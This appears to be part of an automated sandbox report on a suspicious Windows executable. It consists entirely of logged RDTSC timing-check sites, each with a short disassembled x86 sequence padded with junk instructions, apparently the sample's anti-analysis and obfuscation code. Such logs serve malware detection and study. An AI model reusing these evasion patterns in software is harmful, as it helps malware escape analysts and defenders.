                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 25C9AA second address: 25C9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F05491602E1h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26A402 second address: 26A426 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0549119941h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26A426 second address: 26A440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E0h 0x00000007 jbe 00007F05491602DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26816F second address: 268186 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F054911993Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268186 second address: 26818C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26818C second address: 268190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268190 second address: 2681B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F05491602E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2681B2 second address: 2681C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F054911993Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2681C3 second address: 2681E9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jo 00007F05491602D6h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268487 second address: 26848F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26848F second address: 268495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2685C4 second address: 2685C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268710 second address: 268716 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268716 second address: 268735 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0549119948h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268D0B second address: 268D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268D0F second address: 268D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0549119940h 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268E86 second address: 268EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F05491602E8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268EA5 second address: 268EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268EA9 second address: 268EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26900A second address: 269014 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269014 second address: 269018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269018 second address: 269033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F0549119942h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269033 second address: 26904E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jng 00007F05491602DCh 0x0000000d ja 00007F05491602DCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26904E second address: 269062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F054911993Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269062 second address: 269066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269066 second address: 26906C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26933E second address: 269346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2694DC second address: 2694F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F054911993Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2694F7 second address: 2694FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2694FF second address: 26950F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0549119936h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269AC4 second address: 269AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269AC8 second address: 269ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269ACC second address: 269AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269AD4 second address: 269ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269ADA second address: 269ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269ADE second address: 269AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269DD3 second address: 269DD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269DD7 second address: 269DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F0549119936h 0x0000000e jmp 00007F054911993Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269DF1 second address: 269DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26B979 second address: 26B97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26B97F second address: 26B994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F05491602DAh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26B994 second address: 26B998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26B998 second address: 26B99C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26CEA0 second address: 26CEA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2753FF second address: 275436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F05491602D6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jnl 00007F05491602DEh 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jng 00007F05491602ECh 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F05491602DEh 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27436C second address: 274370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27A5E1 second address: 27A5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27A5E6 second address: 27A5EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27A5EB second address: 27A615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F05491602E3h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F05491602DEh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jng 00007F05491602D6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 279DE2 second address: 279DE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 279F9D second address: 279FA7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F05491602D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27A386 second address: 27A38A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 23BB43 second address: 23BB49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 23BB49 second address: 23BB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F054911993Bh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C300 second address: 27C31C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F05491602D6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C3BA second address: 27C455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F054911994Ah 0x0000000c jmp 00007F0549119944h 0x00000011 popad 0x00000012 add dword ptr [esp], 2D96D14Fh 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F0549119938h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1CA7h], ecx 0x00000039 call 00007F0549119939h 0x0000003e pushad 0x0000003f pushad 0x00000040 jmp 00007F054911993Fh 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 popad 0x00000048 pushad 0x00000049 push esi 0x0000004a pop esi 0x0000004b push eax 0x0000004c pop eax 0x0000004d popad 0x0000004e popad 0x0000004f push eax 0x00000050 pushad 0x00000051 jmp 00007F054911993Bh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F0549119949h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C455 second address: 27C478 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F05491602E2h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C478 second address: 27C4C1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F0549119936h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f pushad 0x00000010 jp 00007F0549119936h 0x00000016 jmp 00007F0549119941h 0x0000001b popad 0x0000001c js 00007F0549119938h 0x00000022 push edx 0x00000023 pop edx 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F0549119942h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C4C1 second address: 27C4C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C733 second address: 27C737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C737 second address: 27C740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C802 second address: 27C817 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F054911993Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C9C2 second address: 27C9CC instructions: 0x00000000 rdtsc 0x00000002 js 00007F05491602DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27C9CC second address: 27C9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0549119940h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27CA8A second address: 27CA90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27D6D6 second address: 27D6E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27D6E2 second address: 27D70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F05491602E5h 0x0000000a popad 0x0000000b nop 0x0000000c mov esi, dword ptr [ebp+122D3A77h] 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27D70C second address: 27D711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27DC05 second address: 27DC89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a stc 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F05491602D8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push eax 0x00000028 je 00007F05491602DCh 0x0000002e mov edi, dword ptr [ebp+122D3A77h] 0x00000034 pop esi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F05491602D8h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 je 00007F05491602D6h 0x00000057 mov esi, dword ptr [ebp+122D2BC0h] 0x0000005d xchg eax, ebx 0x0000005e push ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 jns 00007F05491602D6h 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27F706 second address: 27F70A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27F7B1 second address: 27F7B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27F7B7 second address: 27F7BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27F7BD second address: 27F7C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 280280 second address: 280285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 281CBE second address: 281CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 236940 second address: 23694B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 23694B second address: 236953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 282312 second address: 282316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 282BC2 second address: 282BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2869CC second address: 2869D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28901E second address: 289022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 289022 second address: 28902C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 289524 second address: 28952F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F05491602D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28B529 second address: 28B546 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119943h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28B546 second address: 28B54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28C511 second address: 28C52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0549119946h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28C52B second address: 28C54E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28C54E second address: 28C552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28B793 second address: 28B79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28B79A second address: 28B79F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28C552 second address: 28C56B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28D6D9 second address: 28D6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28D6DE second address: 28D6F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DFh 0x00000009 rdtsc
